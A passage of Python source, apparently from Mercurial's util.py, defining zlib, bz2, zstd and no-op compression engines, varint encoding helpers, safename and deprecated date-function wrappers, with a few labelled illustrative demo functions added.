        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

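# Illustrative sketch (not part of upstream util.py): the minimum an
# extension needs to register a new engine. The 'identity' name and its
# pass-through behavior are hypothetical; ``compressstream`` and
# ``decompressorreader`` satisfy the interface without declaring bundle,
# wire protocol, or revlog support (those methods default to None).
class _identityengine(compressionengine):
    def name(self):
        return 'identity'

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

# compengines.register(_identityengine())  # an extension would do this
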
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

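# Illustrative sketch (not part of upstream util.py): a compressstream /
# decompressorreader round trip through the registered 'zlib' engine.
# ``stringio`` is pycompat's BytesIO, imported at the top of this module.
def _demozlibroundtrip():
    engine = compengines['zlib']
    expected = b'data ' * 100
    compressed = ''.join(engine.compressstream([expected]))
    reader = engine.decompressorreader(stringio(compressed))
    return reader.read(len(expected)) == expected
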
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

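# Illustrative sketch (not part of upstream util.py): callers should probe
# availability before relying on the optional zstd engine, since its C
# module may be missing. forbundlename() aborts for known-but-unavailable
# engines, so this guard lets callers fall back gracefully.
def _pickbundleengine():
    if 'zstd' in compengines and compengines['zstd'].available():
        return compengines.forbundlename('zstd')
    return compengines.forbundlename('gzip')
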
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

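# Illustrative sketch (not part of upstream util.py): safename() only needs
# ``in`` support from ctx, so a plain set stands in for a real context here.
def _demosafename():
    ctx = {'a.txt~base', 'a.txt~base~1'}  # names already taken
    return safename('a.txt', 'base', ctx)  # -> 'a.txt~base~2'
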
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

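# Illustrative sketch (not part of upstream util.py): readexactly() turns a
# short read into an explicit Abort instead of silently returning less data.
def _demoreadexactly():
    fh = stringio(b'abcdef')
    assert readexactly(fh, 4) == b'abcd'
    readexactly(fh, 4)  # only 2 bytes left -> raises error.Abort
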
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7

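# Illustrative sketch (not part of upstream util.py): the two varint helpers
# round-trip through any .read(N)-style stream, e.g. pycompat's stringio.
def _demouvarint():
    payload = uvarintencode(1337) + uvarintencode(0)
    fh = stringio(payload)
    assert uvarintdecodestream(fh) == 1337
    assert uvarintdecodestream(fh) == 0
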
###
# Deprecation warnings for util.py splitting
###

defaultdateformats = dateutil.defaultdateformats

extendeddateformats = dateutil.extendeddateformats

def makedate(*args, **kwargs):
    msg = ("'util.makedate' is deprecated, "
           "use 'utils.dateutil.makedate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.makedate(*args, **kwargs)

def datestr(*args, **kwargs):
    msg = ("'util.datestr' is deprecated, "
           "use 'utils.dateutil.datestr'")
    nouideprecwarn(msg, "4.6")
    debugstacktrace()
    return dateutil.datestr(*args, **kwargs)

def shortdate(*args, **kwargs):
    msg = ("'util.shortdate' is deprecated, "
           "use 'utils.dateutil.shortdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.shortdate(*args, **kwargs)

def parsetimezone(*args, **kwargs):
    msg = ("'util.parsetimezone' is deprecated, "
           "use 'utils.dateutil.parsetimezone'")
    nouideprecwarn(msg, "4.6")
    return dateutil.parsetimezone(*args, **kwargs)

def strdate(*args, **kwargs):
    msg = ("'util.strdate' is deprecated, "
           "use 'utils.dateutil.strdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.strdate(*args, **kwargs)

def parsedate(*args, **kwargs):
    msg = ("'util.parsedate' is deprecated, "
           "use 'utils.dateutil.parsedate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.parsedate(*args, **kwargs)

def matchdate(*args, **kwargs):
    msg = ("'util.matchdate' is deprecated, "
           "use 'utils.dateutil.matchdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.matchdate(*args, **kwargs)